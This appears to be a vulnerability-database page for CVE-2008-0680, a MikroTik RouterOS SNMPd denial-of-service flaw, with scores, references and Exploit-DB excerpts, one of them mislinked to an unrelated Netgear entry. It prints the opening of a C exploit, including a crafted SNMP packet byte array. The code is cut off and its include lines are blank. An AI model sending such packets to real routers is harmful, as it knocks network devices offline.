CVE-2008-0680
published 2008-02-12CVE-2008-0680: SNMPd in MikroTik RouterOS 3.2 and earlier allows remote attackers to cause a denial of service (daemon crash) via a crafted SNMP SET request.
PriorityP337high7.8CVSS 2.0
AVNACLAuNCNINAC
EXPLOIT
EPSS
7.44%
93.7th percentile
SNMPd in MikroTik RouterOS 3.2 and earlier allows remote attackers to cause a denial of service (daemon crash) via a crafted SNMP SET request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microtik | routeros | <= 3.2 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Netgear SSL312 Router - Denial of Service
exploitdb·2009-02-09
CVE-2009-0680 Netgear SSL312 Router - Denial of Service
Netgear SSL312 Router - Denial of Service
---
_ _ _____ _ ___ _____ _ _
/ / / / ____/ / / _/_ __/ / / /
/ /_/ / __/ / / / / / / / /_/ /
/ __ / /___/ /____/ / / / / __ /
/_/ /_/_____/_____/___/ /_/ /_/ /_/
Helith - 0815
Author : Rembrandt
Date : 2008-02-27
Affected Software: propietary CGI
Affected OS : Netgear embedded Linux for the SSL312 router
Propably other devices are affected as well
Type : Denial of Service
OSVDB :
Milw0rm : 8008
CVE :
ISS X-Force: :
BID : 33675
Trying to fix it responsible and get in contact with the vendor:
-- ZDI --
Case Opened 2008-12-28 07:57 GMT-6
Case Closed 2009-01-15 17:01 GMT-6
"After some deliberation we have unfortunately decided that we won't be
accepting bugs affecting NetGear products."
-- END --
Contacting Netgear and mitre.org: 2009-02-01 1
Exploit-DB
MicroTik RouterOS 3.2 - SNMPd snmp-set Denial of Service
exploitdb·2008-02-03
CVE-2008-0680 MicroTik RouterOS 3.2 - SNMPd snmp-set Denial of Service
MicroTik RouterOS 3.2 - SNMPd snmp-set Denial of Service
---
/* --------------------------------------------------------------------------
* (c) ShadOS 2008
* _ _ _ _ _ __ _ _ _
* | || |___| | | |/ /_ _ (_)__ _| |_| |_ ___
* | __ / -_) | | '
#include
#include
#include
#include
#include
#include
#include
#include
#include
char evilcode[] = {
0x19, 0x02, 0x02, 0x1e, 0x0c, 0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x30, 0x0d, 0x30, 0x0b, 0x06, 0x07, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x05, 0x00, 0x00
};
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *w++;
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *) (&answer) = *(u_char *) w;
sum += answer
No writeups or analysis indexed.
http://hellknights.void.ru/shados/snmp_sploit.chttp://secunia.com/advisories/28762http://www.securityfocus.com/bid/27599http://www.vupen.com/english/advisories/2008/0399https://www.exploit-db.com/exploits/5054http://hellknights.void.ru/shados/snmp_sploit.chttp://secunia.com/advisories/28762http://www.securityfocus.com/bid/27599http://www.vupen.com/english/advisories/2008/0399https://www.exploit-db.com/exploits/5054
2008-02-12
Published